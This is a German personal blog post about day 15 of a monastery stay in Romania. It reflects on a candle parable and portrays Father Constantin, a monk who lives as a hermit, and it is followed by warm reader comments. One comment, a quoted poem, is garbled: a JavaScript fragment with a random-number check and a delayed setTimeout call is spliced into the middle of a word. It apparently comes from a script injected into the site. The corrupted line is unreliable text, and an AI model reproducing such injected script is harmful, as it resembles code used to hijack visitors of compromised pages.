Tag 15 (wg. Schneefall kein Netz, daher verspätet)

Tag 15

Wenn Du eine Kerze an einer brennenden Kerze entzündest, passiert mit der brennenden Kerze nichts. Sie gibt einfach nur ihr Licht weiter, ohne dass es sie verändert. So können sich an einer einzelnen Kerze tausende andere entzünden und einen Tanzsaal zum Strahlen bringen, ohne dass es die erste Kerze „etwas kostet“. Die Erkenntnis stammt nicht von mir, sondern von einem anderen Autor, dessen Name ich nicht im Kopf habe. Heute Morgen hat Bruder Tuck eine Kerze an einer anderen entzündet, was er regelmäßig macht und heute kam mir die Erinnerung an das Kerzengleichnis. Um 6:15 Uhr in einer Kirche rumzustehen scheint eine gute Zeit für Tiefschürfendes zu sein. Wer hätte das gedacht.

Wenn ich mein eigenes Potential zum Leuchten bringe, können sich andere an mir entzünden, ohne dass ich abgeben muss, ohne dass ich Energie verliere. Wenn es mir gelingt, mein eigenes Potential auszuschöpfen, bin ich eine Flamme, die die Welt verbessert. Ich muss gar nicht „da raus“ und kämpfen, auch dieses Spiel wird innen gespielt. Das eigene Potential ausschöpfen. Leicht gesagt (und schwierig umzusetzen), doch es erscheint mir logisch und zwingend in seiner Klarheit und der sich daraus ergebenden Schlussfolgerung. Also weiter an mir selbst rumwurschteln. Was fahre ich auch in ein Kloster? Dass ich der Trainer bin, der seit Jahren das Motto „vormachen, nachmachen, üben“ auf seiner Internetseite stehen hat, lasse ich an dieser Stelle mal galant unter den Tisch fallen.

Ich wollte Euch von den Menschen hier erzählen. Am Sonntag habe ich Pater Constantin kennengelernt. Er spricht etwas Englisch und so konnten wir uns austauschen und ich konnte ein paar Fragen loswerden. Constantin ist eine Kerze. In seiner Nähe ist es warm, er strahlt Liebe und Klarheit aus. Am Samstag hielt ich ihn für einen Lehrer. Er hat „seine Jungs“ mit einem Sanftmut und einer Fürsorge während der Messe begleitet und geführt, dass mich tief angerührt hat. Es gibt Lehrer, die machen dich dankbar dafür, bei ihnen lernen zu dürfen. Dabei ist er gar kein Lehrer. Die Jungs kamen von der orthodoxen Schule, die zum Kloster Neamt gehört, haben am Sonntag hier eine Art Prüfung abgelegt vor mehr als 100 Besuchern in der Kirche und er hat sie in der Vorbereitung betreut. Doch das nur nebenbei. Constantin gehört hier zum Kloster, ist jedoch nur von Freitagabend bis Sonntagabend hier. Den größten Teil der Zeit lebt er allein in einem kleinen Holzhaus im Wald. Das macht er seit 14 Jahren so. 5 Tage die Woche komplett allein ohne jeden Kontakt zur Außenwelt. So einen Menschen habe ich vorher noch nie getroffen. Bis er 40 Jahre alt war, hat er ein „normales“ Leben in Bukarest geführt. Dann hat er sein Leben verändert (warum weiß ich nicht) und ist hier angekommen. „This is my place“ hat er mir gesagt und inzwischen ist er 54. Die meisten von uns haben mit der Authentizität noch so ihre Probleme, mich eingeschlossen. Was wir sagen und was wir ausstrahlen ist nicht immer deckungsgleich. Konstantin ist authentisch. Liebe, Klarheit, Zufriedenheit und in seinen Augen ist keine Spur von Zweifel.

Beim ersten Blick am Samstag hatte ich sofort die Assoziation „Typ kanadischer Eishockeytrainer“. Weiß der Geier warum. Einer, der mit sanfter Konsequenz seine Jungs zu Meistern macht. Wenn er den Psalm vorliest, trägt er eine Lesebrille und hat dann von der Seite etwas vom späten Robert de Niro. Super gepflegter, grau melierter Vollbart, akkurat gestutzt (was bei den anderen Zauseln hier echt auffällt), kräftige Gestalt ohne Bauch, vorne Geheimratsecken im noch schwarzen Haar und hinten ein Mäusezöpfchen. Sehr gepflegte Hände und einen unfassbaren Blick. Der Mann ist eine Kerze. Sein Weg ist nicht mein Weg, doch ihn kennengelernt zu haben, macht aus einer theoretischen Überlegung eine praktische Erfahrung: es geht! Man kann da hinkommen. Also weitermachen.

 

Constantin’s Fußspuren von seiner Hütte zum Kloster.

6 Gedanken zu „Tag 15 (wg. Schneefall kein Netz, daher verspätet)

  1. Roolf

    Lieber Götz,
    mit deinen Gedanken beginne ich heute meinen Tag. Ich schließe mich an…..“ um mit meinem Potenzial die Welt zu verbessern“ das wie wird sich ergeben. und das wie zum Ausschöpfen des Potenzials, das ergibt sich auch, wenn wir erst eine Entscheidung dazu getroffen haben.
    in kleinen Dingen vertrauen wir meistens darauf dass es schon klappt…. . Das klappt auch in großen, weittragenden Entscheidungen. ganz sicher
    Dein Roolf

    • GoetzWache2018 Autor des Beitrags

      Lieber Roolf, Du bist nicht umsonst mein Seelencoach und mein Freund.

  2. Dorothea G.

    Hallo Götz, hast Du schon einmal überlegt, nicht doch in die Literatur einzusteigen, Du schreibst so schön. Habe jetzt einige Tage am Stück gelesen und da ich Rumänien gut kenne, habe ich ganz viel vor Augen.
    Morgen muss ich meine sehr enge Freundin zu Grabe tragen und Dein Blog hilft mir, jetzt friedlich einzuschlafen.
    Ich bin nicht so weise wie Du also zitiere ich zum Thema Licht wieder einmal aus fremder Quelle:
    Das Licht in uns
    Wir können uns auf unsere innere Kraft konzentrieren in unserem Herzen
    Sie weitet sich aus wie ein goldener Lichtball in unserem Körper
    dann darüber hinaus in den ganzen Raum, dann auch darüber hinaus
    Wir hüllen alles in die Lichtkugel und weiten uns über die Stadt,
    über unser Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, dann um die ganze Welt
    und schließlich durch das ganze Universum
    Unser Liebe schließt alles ein und umhüllt uns ganz
    Wir sind mit allem verbunden

    • GoetzWache2018 Autor des Beitrags

      Liebe Doro, ich weiß ja, wen Du heute beerdigst und bin in Gedanken bei Dir. Ja, wir sind mit allem verbunden. Es ist nur häufig so schwer zu fühlen in einer Welt der Trennung.

  3. Guido

    Hola Götz,
    ich wollte Dir nur mitteilen, dass ich seit einigen Tagen Deiner Reise und vor allem
    Deinen Gedanken und Erkenntnissen folge.
    Sicher muntert es Dich in Deinem kalten Zimmer ein wenig auf, wenn Du weisst
    nicht ganz allein auf der Welt zu sein
    Also……hasta pronto
    Saludos
    Guido

    • GoetzWache2018 Autor des Beitrags

      Lieber Guido, ich danke Dir sehr, dass Du die aktuellen Temperaturen bei Deiner Finca auf Malle unerwähnt lässt.

Die Kommentare sind geschlossen.